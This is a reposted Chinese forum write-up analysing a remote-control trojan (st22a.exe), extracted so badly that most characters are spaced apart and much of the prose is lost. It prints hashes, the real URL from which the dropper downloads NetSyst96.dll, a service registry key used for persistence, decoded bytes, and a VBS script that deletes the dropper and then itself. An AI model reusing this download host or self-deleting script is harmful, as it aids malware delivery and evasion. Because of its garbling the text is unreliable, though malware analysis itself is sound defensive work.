[19211] 2018-01-12_病毒分析实战篇--远控病毒分析

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2018-01-12_病毒分析实战篇--远控病毒分析 - - i   2 0 1 8 - 0 1 - 1 2 i c q 5 f 7 a 0 7 5 d i s t 2 2 a . e x e M D 5 c 2 9 3 c 2 8 4 2 7 8 9 a 7 a 3 9 1 c 9 c a 8 2 2 7 1 b 8 6 1 e S H A - 1 f 2 d 4 a f a 8 5 d d 0 d 9 a b 8 5 3 d e 7 9 6 6 3 6 6 8 e 0 3 b c 0 c f f f e V T 2 0 1 7 - 1 2 - 3 0   0 1 : 5 6 : 3 2 1 .  
1 s t 2 2 a . e x e : " h t t p : / / 2 1 1 . 1 6 0 . 1 6 6 . 2 0 9 : 9 9 9 8 / N e t S y s t 9 6 . d l l " 2 C d l l m a i n - > 3 D l l F u U p g r a d r s   4 E v e n t A l u z e m   i a x n k g h r   5 M o d u l e   C : P r o g r a m   F i l e s M i c r o s o f t   P y a n q d A j l y b o b . e x e 6 H K E Y _ L O C A L _ M A C H I N E S y s t e m C u r r e n t C o n t r o l S e t s e r v i c e s W s k h l o a g z v t u r b C o n n e c t G r o u p   = n e w = n e w A j l y b o b . e x e 7 n e w 8 s o c k e t 9 2 .   s t 2 2 a . e x e 使 P E I D P E I D s t 2 2 a . e x e :
使 I D A s t 2 2 a . e x e I D A W i n M a i n c a l l c a l l O D I D A + O D 5 0 0 0 0 0 0 0 0 0 % 1 s u b _ 4 0 2 0 7 0 s u b _ 4 0 2 0 7 0 o f f s e t _ s z U r l , s u b _ 4 0 2 0 7 0
s u b _ 4 0 1 9 8 0 B A S E 6 4 B a s e 6 4 5 使 B a s e 6 4 x e 2   x 3 3   x 6 7   x 2 2   x 2 c   x f b   x 0 1   x 8 b x 1 4   x a 8   x 5 d   x 1 f   x 0 d   x 9 7   x 1 8   x 6 c x d 3   x 3 7   x 2 a   x 9 0   x f e   x 8 9   x 6 d   x 8 f x b 7   x a 6   x e 9   x 1 1   x f e   x a d   x 1 1   x 3 a x 0 e   x 2 4   x c 6   x 0 d   x 1 6   x 8 0   x 7 9   x 5 6 x d e   x 8 a 0 x 7 A 0 x 5 9 G e t i n g 5 3 8 h t t p : / / 2 1 1 . 1 6 0 . 1 6 6 . 2 0 9 : 9 9 9 8 / N e t S y s t 9 6 . d l l 访 h t t p : / / 2 1 1 . 1 6 0 . 1 6 6 . 2 0 9 : 9 9 9 8 / H F S 7 9 4 N e t S y s t 9 6 . d l l
2   s u b _ 4 0 1 F 5 0 s u b _ 4 0 1 F 5 0 C : P r o g r a m   F i l e s A p p P a t c h N e t S y s t 9 6 . d l l C : P r o g r a m   F i l e s A p p P a t c h N e t S y s t 9 6 . d l l
使 N e t S y s t 9 6 . d l l 使 G e t i n g 5 3 8 使 K o t h e r 5 9 9
M Z P E N e t S y s t 9 6 . d l l O E P D l l E n t r y P o i n t 使 P E i d N e t S y s t 9 6 . d l l U P X D l l E n t r y P o i n t
N e t S y s t 9 6 . d l l D l l F u U p g r a d r s D l l F u U p g r a d r s 2 . 3 .   D l l F u U p g r a d r s   使 M D 5 N e t S y s t 9 6 . d l l D l l F u U p g r a d r s / c U l l m 9 4 6 . . . 使
退 A l u z e m   i a x n k g h r E v e n t V B S
d i m   w s h . . O n   E r r o r   R e s u m e   N e x t s e t   w s h = c r e a t e O b j e c t ( " W S c r i p t . S h e l l " ) . . S e t   o b j F S O   =   C r e a t e O b j e c t ( " S c r i p t i n g . F i l e S y s t e m O b j e c t " ) . . w s c r i p t . s l e e p   1 0 0 0 . . o b j F S O . D e l e t e F i l e ( " C : U s e r s 1 4 2 1 5 D e s k t o p s t 2 2 a . e x e " ) ,   T r u e . . c r e a t e o b j e c t ( " s c r i p t i n g . f i l e s y s t e m o b j e c t " ) . d e l e t e f i l e   w s c r i p t . s c r i p t f u l l n a m e E v e n t   C : P r o g r a m   F i l e s M i c r o s o f t   P y a n q d A j l y b o b . e x e   C : P r o g r a m   F i l e s M i c r o s o f t   P y a n q d A j l y b o b . e x e H K E Y _ L O C A L _ M A C H I N E S y s t e m C u r r e n t C o n t r o l S e t s e r v i c e s W s k h l o   a g z v t u r b D e l e t e F i l e s A j l y b o b . e x e H K E Y _ L O C A L _ M A C H I N E S y s t e m C u r r e n t C o n t r o l S e t s e r v i c e s W s k h l o a g z v t u r b C o n n e c t G r o u p   A j l y b o b . e x e n e w : A j l y b o b . e x e
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则